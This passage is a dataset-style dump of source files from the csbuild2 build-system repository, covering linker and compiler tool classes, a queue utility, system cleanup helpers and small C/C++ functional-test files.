csbuild.ProjectType.SharedLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"-oformat=prx\",\n\t\t\t\t\"-prx-stub-output-dir={}\".format(project.outputDir),\n\t\t\t])\n\t\treturn args\n\n\tdef _getCustomLinkerArgs(self):\n\t\treturn self._linkerFlags\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutFile = \"{}\".format(self._getOutputFiles(project)[0])\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn [outFile]\n\t\treturn [\"-o\", outFile]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n\n\tdef _getLibraryPathArgs(self):\n\t\targs = [\"-L{}\".format(os.path.dirname(lib)) for lib in self._actualLibraryLocations.values()]\n\t\treturn args\n\n\tdef _getLibraryArgs(self):\n\t\tlibNames = [os.path.basename(lib) for lib in self._actualLibraryLocations.values()]\n\t\targs = []\n\n\t\tfor lib in libNames:\n\t\t\tlibName, libExt = os.path.splitext(lib)\n\t\t\tif libName.startswith(\"lib\"):\n\t\t\t\tlibName = libName[3:]\n\n\t\t\tif libExt == \".suprx\":\n\t\t\t\tlibName = \"{}_stub\".format(libName)\n\n\t\t\targs.append(\"-l{}\".format(libName))\n\n\t\treturn args\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\"--start-group\"]\n\n\tdef _getEndGroupArgs(self):\n\t\treturn [\"--end-group\"]\n" }, { "alpha_fraction": 0.7649694681167603, "alphanum_fraction": 0.7670060992240906, "avg_line_length": 38.59677505493164, "blob_id": "8db3962b039af81acc533cb8b1e1015992ca783d", "content_id": "dec29ba4c88c4242ba2d0f677416d30dd9155f94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2455, "license_type": "no_license", "max_line_length": 79, "num_lines": 62, "path": "/functional_tests/basic_cpp_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\n\ncsbuild.SetOutputDirectory(\"out\")\ncsbuild.SetDefaultTarget(\"static\")\n\nwith csbuild.Target(\"static\"):\n\tcsbuild.SetOutputDirectory(\"static\")\n\nwith csbuild.Target(\"shared\"):\n\tcsbuild.SetOutputDirectory(\"shared\")\n\nwith csbuild.Project(\"libhello\", \"libhello\"):\n\twith csbuild.Target(\"shared\"):\n\t\tcsbuild.SetOutput(\"libhello\", csbuild.ProjectType.SharedLibrary)\n\n\twith csbuild.Target(\"static\"):\n\t\tcsbuild.SetOutput(\"libhello\", csbuild.ProjectType.StaticLibrary)\n\nwith csbuild.Project(\"hello_world\", \"hello_world\", [\"libhello\"]):\n\tcsbuild.Platform(\"Darwin\").AddLibraries(\"libgmalloc.dylib\")\n\tcsbuild.Platform(\"Linux\").AddLibraries(\"pthread\", \"libm.so\", \"libc.so.6\")\n\tcsbuild.Platform(\"Windows\").AddLibraries(\"winmm\", \"DbgHelp.lib\")\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"fail_libraries\", \"hello_world\"):\n\tcsbuild.AddLibraries(\"nonexistent\", \"nothere\")\n\tcsbuild.SetOutput(\"hello_world\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"fail_compile\", \"fail_compile\"):\n\tcsbuild.SetOutput(\"fail_compile\", csbuild.ProjectType.Application)\n\nwith csbuild.Project(\"fail_link\", \"fail_link\"):\n\tcsbuild.SetOutput(\"fail_link\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.6785714030265808, "avg_line_length": 13, "blob_id": "0829715f0b243b702682fc3791c76fe2965cab63", "content_id": "38bd56bd267525a9cc5dee74d6896bd1caedfc12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 28, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/functional_tests/cpp_recursive_header_test/hello_world/b.h", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#pragma once\n#include \"a.h\"\n" }, { "alpha_fraction": 0.7286719679832458, "alphanum_fraction": 0.7308707237243652, "avg_line_length": 31.95652198791504, "blob_id": "031a9587b52ab63b8cfd22d6bcf85bb2f8181d64", "content_id": "ca4857fa33deba905e278a3f9c3550a3efb4829b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2274, "license_type": "no_license", "max_line_length": 114, "num_lines": 69, "path": "/csbuild/_utils/queue.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: queue\n\t:synopsis: Lock-free queue\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport threading\nfrom collections import deque\n\nclass Queue(object):\n\t\"\"\"\n\tSpecialized version of queue.Queue tailored to a smaller feature set to reduce unnecessary locking and contention\n\t\"\"\"\n\tdef __init__(self):\n\t\tself._deque = deque()\n\t\t# Semaphore used as an event to prevent Put() from having to take a lock to wake a thread in GetBlocking().\n\t\tself._sema = threading.Semaphore(0)\n\n\tdef Put(self, item):\n\t\t\"\"\"\n\t\tPut an item into the queue\n\t\t:param item: whatever\n\t\t:type item: any\n\t\t\"\"\"\n\t\tself._deque.append(item)\n\t\tself._sema.release()\n\n\tdef Get(self):\n\t\t\"\"\"\n\t\tGet an item out of the queue\n\t\t:raises IndexError: If nothing is in the queue\n\t\t:return: Whatever was put into the queue\n\t\t:rtype: any\n\t\t\"\"\"\n\t\tif not self._sema.acquire(False):\n\t\t\traise IndexError(\"Get() on an empty queue\")\n\t\treturn self._deque.popleft()\n\n\tdef GetBlocking(self):\n\t\t\"\"\"\n\t\tGet an item out of the queue, blocking if there is nothing to get.\n\t\t:return: Whatever was put into the queue\n\t\t:rtype: any\n\t\t\"\"\"\n\t\tself._sema.acquire()\n\t\treturn self._deque.popleft()\n" }, { "alpha_fraction": 0.6549317836761475, "alphanum_fraction": 0.6562004685401917, "avg_line_length": 36.0941162109375, "blob_id": "88e21f846e5033638da0e893fe9f45919d861b7d", "content_id": "7cd24715a8019e5f72d836131669b823126bd004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3153, "license_type": "no_license", "max_line_length": 117, "num_lines": 85, "path": "/csbuild/tools/common/java_tool_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: java_tool_base\n\t:synopsis: Abstract base class for Java tools.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom abc import ABCMeta\n\nfrom ..._utils.decorators import MetaClass\nfrom ...toolchain import Tool\n\n\n@MetaClass(ABCMeta)\nclass JavaToolBase(Tool):\n\t\"\"\"\n\tParent class for all tools targetting Java applications.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\t\tself._javaBinPath = projectSettings.get(\"javaBinPath\", \"\")\n\n\t\t# The intermediate directory apparently doesn't exist on the project by this point,\n\t\t# so we'll keep the root directory name underneath it, then form the full path to\n\t\t# it when we build.\n\t\tself._javaClassRootDirName = \"java_class_root\"\n\n\t\t# When no Java binary path is explicitly provided, attempt to get it from the environment.\n\t\tif not self._javaBinPath and \"JAVA_HOME\" in os.environ:\n\t\t\tself._javaBinPath = os.path.join(os.environ[\"JAVA_HOME\"], \"bin\")\n\n\t\tif self._javaBinPath:\n\t\t\tassert os.access(self._javaBinPath, os.F_OK), \"Java binary path does not exist: {}\".format(self._javaBinPath)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tTool.SetupForProject(self, project)\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef SetJavaBinaryPath(path):\n\t\t\"\"\"\n\t\tSets the path to the Java binaries.\n\n\t\t:param path: Java binary path.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"javaBinPath\", os.path.abspath(path))\n" }, { "alpha_fraction": 0.7418426275253296, "alphanum_fraction": 0.7434421181678772, "avg_line_length": 30.57575798034668, "blob_id": "086641fe6dd608f52dca5b1263b0a79f5c70dc1a", "content_id": "183deb41b781936f5cf5b50c68217e4b6ce695f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3126, "license_type": "no_license", "max_line_length": 97, "num_lines": 99, "path": "/csbuild/_utils/system.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: system\n\t:synopsis: functions with functionality analogous to the sys module, but specialized for csbuild\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport functools\nimport imp\nimport os\nimport platform\nimport traceback\n\nfrom . import shared_globals\nfrom .. import commands, perf_timer, log\n\nif platform.system() == \"Windows\":\n\tdef SyncDir(_):\n\t\t\"\"\"\n\t\tSynchronize a directory to ensure its contents are visible to other applications.\n\t\tDoes nothing on Windows.\n\t\t:param _: Directory name\n\t\t:type _: str\n\t\t\"\"\"\n\t\tpass\nelse:\n\tdef SyncDir(dirname):\n\t\t\"\"\"\n\t\tSynchronize a directory to ensure its contents are visible to other applications.\n\t\tDoes nothing on Windows.\n\t\t:param dirname: Directory name\n\t\t:type dirname: str\n\t\t\"\"\"\n\t\tdirfd = os.open(dirname, os.O_DIRECTORY) # pylint: disable=no-member\n\t\tos.fsync(dirfd)\n\t\tos.close(dirfd)\n\ndef CleanUp():\n\t\"\"\"\n\tClean up the various plates we're spinning so they don't crash to the ground or spin forever\n\t\"\"\"\n\ttry:\n\t\twith perf_timer.PerfTimer(\"Cleanup\"):\n\n\t\t\tif shared_globals.commandOutputThread is not None:\n\t\t\t\tcommands.queueOfLogQueues.Put(commands.stopEvent)\n\t\t\t\tshared_globals.commandOutputThread.join()\n\n\t\tif shared_globals.runPerfReport:\n\t\t\tif shared_globals.runPerfReport != perf_timer.ReportMode.HTML:\n\t\t\t\toutput = functools.partial(log.Custom, log.Color.WHITE, \"PERF\")\n\t\t\telse:\n\t\t\t\toutput = None\n\t\t\tperf_timer.PerfTimer.PrintPerfReport(shared_globals.runPerfReport, output=output)\n\n\t\tlog.StopLogThread()\n\texcept:\n\t\ttraceback.print_exc()\n\tfinally:\n\t\tif not imp.lock_held():\n\t\t\timp.acquire_lock()\n\n\t# TODO: Kill running subprocesses\n\t# TODO: Exit events for plugins and toolchains\n\ndef Exit(code = 0):\n\t\"\"\"\n\tExit the build process early\n\n\t:param code: Exit code to exit with\n\t:type code: int\n\t\"\"\"\n\tCleanUp()\n\t# Die hard, we don't need python to clean up and we want to make sure this exits.\n\t# sys.exit just throws an exception that can be caught. No catching allowed.\n\t# pylint: disable=protected-access\n\tos._exit(code)\n" }, { "alpha_fraction": 0.6815410852432251, "alphanum_fraction": 0.6854425668716431, "avg_line_length": 34.506492614746094, "blob_id": "ba5e2f60e1e99d28dcd6d72e31c079cc5a3dd4e4", "content_id": "3e5d0356e1b0d69a2466294f986dd99a38f90b72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8202, "license_type": "no_license", "max_line_length": 135, "num_lines": 231, "path": "/csbuild/tools/linkers/msvc_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_linker\n\t:synopsis: msvc linker tool for C++, d, asm, etc\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .linker_base import LinkerBase\nfrom ..common import FindLibraries\nfrom ..common.msvc_tool_base import MsvcToolBase\nfrom ..common.tool_traits import HasDebugLevel, HasIncrementalLink\nfrom ... import log\nfrom ..._utils import ordered_set, response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\n\ndef _ignore(_):\n\tpass\n\nclass MsvcLinker(MsvcToolBase, LinkerBase, HasIncrementalLink):\n\t\"\"\"\n\tMSVC linker tool implementation for c++ and asm.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x86\", \"x64\", \"arm64\" }\n\tinputGroups = { \".obj\", \".o\" }\n\toutputFiles = { \".exe\", \".lib\", \".dll\" }\n\tcrossProjectDependencies = { \".lib\" }\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tMsvcToolBase.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\t\tHasIncrementalLink.__init__(self, projectSettings)\n\n\t\tself._libExePath = None\n\t\tself._linkExePath = None\n\n\tdef _getEnv(self, project):\n\t\treturn self.vcvarsall.env\n\n\tdef _getOutputFiles(self, project):\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\toutputFiles = {\n\t\t\tcsbuild.ProjectType.Application: [\"{}.exe\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.StaticLibrary: [\"{}.lib\".format(outputPath)],\n\t\t\tcsbuild.ProjectType.SharedLibrary: [\"{}.dll\".format(outputPath)],\n\t\t}[project.projectType]\n\n\t\t# Output files when not building a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\toutputFiles.append(\"{}.ilk\".format(outputPath))\n\n\t\t\t# Add the PDB file if debugging is enabled.\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\toutputFiles.append(\"{}.pdb\".format(outputPath))\n\n\t\t# Can't predict these things, linker will make them if it decides to.\n\t\tpossibleFiles = [\"{}.exp\".format(outputPath), \"{}.lib\".format(outputPath)]\n\t\toutputFiles.extend([filename for filename in possibleFiles if os.access(filename, os.F_OK)])\n\n\t\treturn tuple(set(outputFiles))\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tcmdExe = self._libExePath\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\n\t\telse:\n\t\t\tcmdExe = self._linkExePath\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getIncrementalLinkArgs(project) \\\n\t\t\t\t+ self._getUwpArgs(project) \\\n\t\t\t\t+ self._getCustomArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryArgs(project)\n\n\t\t# De-duplicate any repeated items in the command list.\n\t\tcmd = list(ordered_set.OrderedSet(cmd))\n\n\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\tdef _findLibraries(self, project, libs):\n\t\tallLibraryDirectories = list(self._libraryDirectories) + self.vcvarsall.libPaths\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".lib\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\t# These are extensions of the files that can be output from the linker or librarian.\n\t\t# The library extensions should represent the file types that can actually linked against.\n\t\text = {\n\t\t\tcsbuild.ProjectType.Application: \".exe\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".lib\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}\n\t\treturn ext.get(projectType, None)\n\n\tdef SetupForProject(self, project):\n\t\tMsvcToolBase.SetupForProject(self, project)\n\t\tLinkerBase.SetupForProject(self, project)\n\t\tHasIncrementalLink.SetupForProject(self, project)\n\n\t\tself._libExePath = os.path.join(self.vcvarsall.binPath, \"lib.exe\")\n\t\tself._linkExePath = os.path.join(self.vcvarsall.binPath, \"link.exe\")\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\n\t\t\t\"/ERRORREPORT:NONE\",\n\t\t\t\"/NOLOGO\",\n\t\t\t\"/MACHINE:{}\".format(project.architectureName.upper()),\n\t\t]\n\n\t\t# Add the subsystem argument if specified.\n\t\tif self.msvcSubsystem:\n\t\t\tsubsystemArg = [\"/SUBSYSTEM:{}\".format(self.msvcSubsystem)]\n\n\t\t\t# The subsystem version is optional.\n\t\t\tif self.msvcSubsystemVersion:\n\t\t\t\tsubsystemArg.append(\",{}.{}\".format(self.msvcSubsystemVersion[0], self.msvcSubsystemVersion[1]))\n\n\t\t\targs.append(\"\".join(subsystemArg))\n\n\t\t# Arguments for any project that is not a static library.\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"/NXCOMPAT\",\n\t\t\t\t\"/DYNAMICBASE\",\n\t\t\t])\n\t\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\t\targs.append(\"/DEBUG\")\n\t\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\t\targs.append(\"/DLL\")\n\t\treturn args\n\n\tdef _getIncrementalLinkArgs(self, project):\n\t\targs = []\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary and self._incrementalLink:\n\t\t\targs.extend([\n\t\t\t\t\"/INCREMENTAL\",\n\t\t\t\t\"/ILK:{}.ilk\".format(os.path.join(project.outputDir, project.outputName)),\n\t\t\t])\n\n\t\treturn args\n\n\tdef _getUwpArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n\n\tdef _getCustomArgs(self):\n\t\t# Eliminate duplicate entries without wrecking the argument order.\n\t\targs = list(ordered_set.OrderedSet(self._linkerFlags))\n\t\treturn args\n\n\tdef _getLibraryArgs(self, project):\n\t\t# Static libraries don't require the default libraries to be linked, so only add them when building an application or shared library.\n\t\targs = [] if project.projectType == csbuild.ProjectType.StaticLibrary else [\n\t\t\t\"kernel32.lib\",\n\t\t\t\"user32.lib\",\n\t\t\t\"gdi32.lib\",\n\t\t\t\"winspool.lib\",\n\t\t\t\"comdlg32.lib\",\n\t\t\t\"advapi32.lib\",\n\t\t\t\"shell32.lib\",\n\t\t\t\"ole32.lib\",\n\t\t\t\"oleaut32.lib\",\n\t\t\t\"uuid.lib\",\n\t\t\t\"odbc32.lib\",\n\t\t\t\"odbccp32.lib\",\n\t\t]\n\t\targs.extend(list(self._actualLibraryLocations.values()))\n\t\treturn args\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutExt = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".dll\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".lib\",\n\t\t}\n\t\toutputPath = os.path.join(project.outputDir, project.outputName)\n\t\targs = [\"/OUT:{}{}\".format(outputPath, outExt.get(project.projectType, \".exe\"))]\n\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"/IMPLIB:{}.lib\".format(outputPath))\n\n\t\tif project.projectType != csbuild.ProjectType.StaticLibrary and self._debugLevel != DebugLevel.Disabled:\n\t\t\targs.append(\"/PDB:{}.pdb\".format(outputPath))\n\n\t\treturn args\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n" }, { "alpha_fraction": 0.5882353186607361, "alphanum_fraction": 0.5980392098426819, "avg_line_length": 10.333333015441895, "blob_id": "768ce8df6f3df411cda7aeacedeb9604670a8dfd", "content_id": "0f04350f218d37ac72a9c94c54af1058fc600c05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 102, "license_type": "no_license", "max_line_length": 25, "num_lines": 9, "path": "/functional_tests/cpp_recursive_header_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include \"a.h\"\n#include \"b.h\"\n\nint main()\n{\n\tprintf(\"Hello, World!\");\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.7013225555419922, "alphanum_fraction": 0.7027920484542847, "avg_line_length": 42.20634841918945, "blob_id": "6e24793cb86031f631b2e8529154866ebde00b6e", "content_id": "a086746bafa6f9762067f99a03f25472c96c99fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2722, "license_type": "no_license", "max_line_length": 151, "num_lines": 63, "path": "/csbuild/tools/cpp_compilers/android_clang_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: android_clang_cpp_compiler\n\t:synopsis: Android clang compiler tool for C++.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .android_gcc_cpp_compiler import AndroidGccCppCompiler\n\nclass AndroidClangCppCompiler(AndroidGccCppCompiler):\n\t\"\"\"\n\tAndroid clang compiler implementation\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tAndroidGccCppCompiler.__init__(self, projectSettings)\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getComplierName(self, project, isCpp):\n\t\tassert os.access(self._androidInfo.clangPath, os.F_OK), \"No Android clang executable found for architecture: {}\".format(project.architectureName)\n\t\tassert os.access(self._androidInfo.clangppPath, os.F_OK), \"No Android clang++ executable found for architecture: {}\".format(project.architectureName)\n\t\treturn self._androidInfo.clangppPath if isCpp else self._androidInfo.clangPath\n\n\tdef _getDefaultArgs(self, project):\n\t\tbaseArgs = []\n\t\tdefaultAndroidArgs = self._getDefaultCompilerArgs()\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\tbaseArgs.append(\"-fPIC\")\n\t\treturn baseArgs + defaultAndroidArgs + [\n\t\t\t\"-gcc-toolchain\",\n\t\t\tself._androidInfo.gccToolchainRootPath,\n\t\t]\n\n\tdef _getArchitectureArgs(self, project):\n\t\ttargetName = self._getTargetTripleName(project.architectureName)\n\t\treturn [\"-target\", targetName]\n" }, { "alpha_fraction": 0.5537189841270447, "alphanum_fraction": 0.5619834661483765, "avg_line_length": 9, "blob_id": "0e8dadf1da65e0ebdb1d856bef96d3409d61b18c", "content_id": "413d24a876058d6a5dca1bb7fb7bc3b35aa62723", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 121, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/functional_tests/basic_asm_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "\n#include <stdio.h>\n\nextern 